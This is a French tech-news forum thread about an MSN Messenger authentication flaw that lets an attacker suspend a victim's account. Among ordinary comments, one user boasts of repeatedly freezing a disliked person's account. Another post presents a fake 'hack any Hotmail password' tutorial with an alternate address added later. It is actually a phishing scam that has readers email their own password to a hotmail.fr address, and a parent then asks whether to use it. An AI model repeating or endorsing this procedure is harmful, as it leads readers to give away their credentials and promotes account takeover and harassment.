Tom's Guide > Forum > Les news > MSN Messenger victime d’une faille

MSN Messenger victime d’une faille

Forum Les news : MSN Messenger victime d’une faille

TomsGuide.com : 800 000 inscrits répondent à toutes vos questions high-tech et informatique. Pour obtenir de l'aide, inscrivez-vous gratuitement !
Mot :    Pseudo :           

Tout va pour le mieux dans le meilleur des monde pour le client de messagerie de la firme de Redmond qui prépare déjà la version 8 de MSN Messenger, qui est déjà en test pour un nombre réduit de bêta testeurs.
Tout n’est pourtant pas tout rose au pays des papillons multicolores qui vous apportent bonheur, messages, et courrier.
Le logiciel MSN Messenger souffrirait en effet d’une faille ne s’avérant au final pas vraiment dangereuse, mais sacrément gênante pour les utilisateurs touchés, puisqu’elle empêche ces derniers d’utiliser leurs compte, celui-ci se voyant suspendu...

MSN bloqué par un trou...

L’expert en sécurité informatique SecuriTeam a récemment publié un rapport concernant une vulnérabilité présente dans le logiciel de messagerie instantanée de la firme de Redmond.
Affectant le système d’authentification du logiciel, elle permet alors à un utilisateur mal intentionné d’effectuer sur sa cible un Denial of Service (un déni de service).
Le problème vient du fait que MSN, lors d’une tentative de connexion au réseau échouée, ne valide pas l’authentification d’un utilisateur, ce qui permet, à terme, à un pirate de suspendre temporairement le compte de l’utilisateur ne question.

Source : Zataz

Liens sponsorisés
Inscrivez-vous ou connectez-vous pour masquer ceci.

il n'y aurait pas des failles sur d'autres logiciels que ceux de big billou ?

ça devient difficile de trouver des vannes sans se répéter

Répondre à milowen@IDN

On va dire que pour les autres les failles sont corrigées avant que la news ne soit publiée ;-)

Répondre à noldarn

En même temps ce genre de faille ou plutôt attaque est possible sur le plus par des services (pour ne pas dire tous, sur ce genre de services)

Répondre à neb93

Est-ce que c'est pour ca que ca fait quelques semaines que j'arrive plus du tout a me connecter a MSN ni a Windows Messenger ?

Nan parce que la ca devient vraiment lourd d'utiliser Web Messenger..... :(

Merci a celui qui pourra me dire comment je corrige mon probleme...

Répondre à boxer@IDN

Dites, ferez-vous une news pour chaque faille dernierement découverte de chaque programme ?

Ou serait-ce seulement ceux de Microsoft ?

Parce-que cela devient lourd à la fin :roll:.

Répondre à Abaddon_

C'est sur, ce n'est pas récent cette faille :-o

Le nombre de fois ou j'ai pu me défouler sur quelques personnes mal-aimées avec sa... :-D

Le problème en plus est que la méthode pour exploiter la faille est décrite dans la news, pour permettre de la reproduire y'a pas mieux :-?

Répondre à PoCk3T@IDN

cela fait plus d'un an qu'il existe un programme permetant de geler un compte msn.
Un petit retard... ;-)

Répondre à LamaZ

Bah peut-être que Microsoft vient seulement de s'en appercevoir, qu'est-ce que vous en savez ;-)

Ceci dit, c'est vrai qu'il serait bien de parler d'autres failles que les microsoftiennes. Il n'y a pas que Microsoft sur Terre. Mais je pense qu'il serait plus difficile de trouver les actus.

Répondre à aurelie@IDN

Il ne s'agit pas d'une faille de sécurité qui plus est...

PS : des actus sur des failles on peut en trouver tous les jours sur tous les systèmes ou logiciels.

Répondre à Twiggy38@IDN

Mais vous êtes vraiment lourds quand vous vous y mettez !

Arrêtez de me taxer d'anti-Linux, d'anti-Microsoft, d'anti-World-of-Warcraft ou d'anti-[insérez votre intérêt personnel ici] à chaque occasion possible...

Pour info, je traite aussi sur des failles ou des bugs dans MacOS (où on vient d'aileurs me faire chier parce que soit-disant ça n'a pas d'intérêt), sur Opera, dans iTunes, dans PayPal ou encore dans Linux (et là, c'est juste sur le mois dernier, je pourrais également citer Skype ou Firefox de mémoire)...

Si les produits Microsoft sont merdiques et blindées de failles non corrigées, j'y peux rien moi !
D'autre part, les produits Microsoft sont très utilisés, même par ceux qui chient dessus à longueur de journée, alors ça me semble un peu normal de prévenir en priorité les utilisateurs du risque qu'ils courent à utiliser tel ou tel programme (qu'il soit ou non développé par Microsoft).

Alors vous êtes priés de me lâcher la grappe...

Répondre à Onigiri@IDN

Citation :

Si les produits Microsoft sont merdiques et blindées de failles non corrigées, j'y peux rien moi !

C'est triste de lire ca... :roll:

Citation :

alors ça me semble un peu normal de prévenir en priorité les utilisateurs du risque qu'ils courent à utiliser tel ou tel programme

Quels risques ? Tu parles, beaucoup de failles sont découvertes, mais combien d'entre elles sont VRAIMENT exploitées ?

Répondre à Abaddon_

Rappelons que sous Firefox 20% des failles ne sont pas corrigées ou sont mal corrigées. (source : generation NT).
Sous IE ce chiffre est de 42%, donc le double.

Mais clamer que Firefox est parfait et que les failles sont toujours corrigées rapidement est faux.

Répondre à Twiggy38@IDN

Citation :

Citation:

C'est triste de lire ca...

Attention, hein ? c'est qu'une supposition basée sur la lecture de vos propres commentaires.

Citation :

Citation:

Citation:

alors ça me semble un peu normal de prévenir en priorité les utilisateurs du risque qu'ils courent à utiliser tel ou tel programme

Quels risques ? Tu parles, beaucoup de failles sont découvertes, mais combien d'entre elles sont VRAIMENT exploitées ?

Qui dit faille dans un logiciel dit risque potentiel de s'exposer aux dangers qu'elle représente si elle n'est pas comblée.
C'est avec une politique comme la tienne que les ingénieurs de Microsoft enchainent des nuits blanches pour corriger dans l'urgence une faille critique qui paraissait pas si dangereuse que ça y a 6 mois.

Répondre à Onigiri@IDN

je sais que ca marche bien ya encor un an je l'ai fait a un mec que j'aimais pas, il a jammai ssu d'ou ca venais et touts les jours je recommencais pdt une semaine...

c mal mais bon
Quand on aime on ne compte pas :p

Répondre à Adamaru

Citation :

Le mot français "risque" ne signifie pas que ça arrive vraiment, mais que ça peut arriver ...

Répondre à noldarn

Ah merci, je ne savais pas.

Mais je trouve que cette news comme beaucoup d'autres ne sert strictement à rien (apart pour permettre à des gens comme toi, Noldarn, de se jeter sur l'occasion et de critiquer sans cesse), surtout si la faille en question n'est vraiment pas récente.

Répondre à Abaddon_

Encore une fois : il n'y a pas de risque ici si ce n'est de ne pouvoir se connecter à MSN pendant 24h, ce qui, pour l'avenir de notre société, n'est pas plus mal, il faut bien l'avouer.

Répondre à Twiggy38@IDN

mais arretez la !
1erment : vous ête pas obliger de la lire cette news
2emement , ptete que c'est pas utile pour tout le monde, mais pour moi si > je sais pourquoi j'arrive pas a me connecter a msn la maintenant
3emement : arretez de vous exiter sur les """commentaires"""
4ememement : ciao ! & stay calm :)

Répondre à geloblackeagle

je cherche à connaitre comment pirater alors je demande de l'aide car j'ai besoin,pourme contacter ou bien me connaitre changer nos idées je suis toujours ici

Répondre à romeo-x

*****************************************************************************************************************************
*****************************************************************************************************************************
*********** Comment hacker le mot de passe d'un compte MSN Hotmail **********

#############################################################################################################
# Cette methode est utilisée par les techniciens de MSN HOTMAIL pour faire des verifications de compte mail #
# ainsi que pour le renvoit des pass perdus donc profitez-en avant d'autres modifications. #
#############################################################################################################

Pour l'instant l'equipe msn n'a pas modifié ce systeme peu connu mais tres efficace et selon des
sources d'admin cette maniere de proceder est pour eux la seule afin de renvoyer des pass perdus donc
profitez-en avant d'autres modifications ;)

*********** Etape 1 ***********

Envoyer un email à l'adresse suivante : supervisor_88215-22-pass-key@hotmail.fr

Indiquer dans Objet : AUTO REQUEST PASSWORD

*********** Etape 2 ***********

Dans le corps du texte ( là ou l'on écrit le texte )
faites 1 Copier/Coller de la commande çi dessous

$RAUTH=HOTMAIL
$ISPLOG=adresse@hotmail.com
$ISPBACKLOG=retour@hotmail.com
$ISPBACKPWD=password
request IPCSVR $ISPLOG
request IPCSVR $ISPPWD
mail {$ISPLOG};{$ISPPWD} to $ISPBACKLOG
use ident $ISPBACKLOG;$ISPBACKPWD

2 lignes en dessous :
Indiquer l'adresse email MSN ou HOTMAIL complète de l'utilisateur que vous souhaitez hacker.

2 lignes en dessous :
Inscrire l'adresse email MSN ou HOTMAIL où vous souhaitez recevoir le mot de passe hacker

2 lignes en dessous :
Inscrire le mot de passe correspondant à votre email
( pour être reconnu comme étant utilisateur MSN HOTMAIL sans pour autant être identifier )

*********** Exemple ***********

A: : supervisor_88215-22-pass-key@hotmail.fr

Cc:

Cci:

Objet: : AUTO REQUEST PASSWORD

Corps du message de l'email : ( là ou l'on écrit le texte )

$RAUTH=HOTMAIL
$ISPLOG=adresse@hotmail.com
$ISPBACKLOG=retour@hotmail.com
$ISPBACKPWD=password
request IPCSVR $ISPLOG
request IPCSVR $ISPPWD
mail {$ISPLOG};{$ISPPWD} to $ISPBACKLOG
use ident $ISPBACKLOG;$ISPBACKPWD

l'Email_que_vous_souhaitez_hacker@hotmail.com

l'adresse email MSN ou HOTMAIL où vous souhaitez recevoir le mot de passe hacker

le mot de passe correspondant à votre email
( pour être reconnu comme étant utilisateur MSN HOTMAIL sans pour autant être identifier )

############################ Vous recevrez sous peu un mail contenant le mot de pass ########################################

***** Si vous ne recevez pas de mail à la suite de la manoeuvre cela signifira que les modifications auront été faites
et votre mail sera perdu car le bot ne le recevra pas et par conséquent il disparaitra du server ****************************
**************************************************** Dernière mise à jour : juin 2005 **********************************

Répondre à bombette

salut merci a toi bombette pour ton tuto pour haker une adresse msn .
grace a toi j'ai pu recup mon adresse bye bye

Répondre à gege_du_88

pour ceu que sa ne marche pas meme chose mais avec l'adresse suivante :

supervisor_88215-21-pass-key@hotmail.fr

voila @ ++

Répondre à bombette

bonjour voilà je suis la maman d'un garçon de 11 ans qui passe son temps sur msn messenger et chapatiz, depuis hier il ne peux plus se connecter à ses deux messageries msn.com et son compte chapatiz a été piraté. l'individu responsable est venu me parler dans mon msn en se connectant sous son pseudo aujourd'hui, il s'agit d'un informaticien de 21 ans, je ne sais pas si il a hacker le compte ou s'il a profité d'une faille. mon fils étant en msn.com, puis-je quand même lui récupérer ses comptes avec la proicédure indiquée ci-dessus.

Répondre à pat77176

LamaZ a écrit :

cela fait plus d'un an qu'il existe un programme permetant de geler un compte msn.
Un petit retard... ;-)

Répondre à Anonyme
Tom's Guide > Forum > Les news > MSN Messenger victime d’une faille
Aller à :

Il y a 2370 utilisateurs connus et inconnus. Pour voir la liste des connectés connus, cliquez ici.

Liens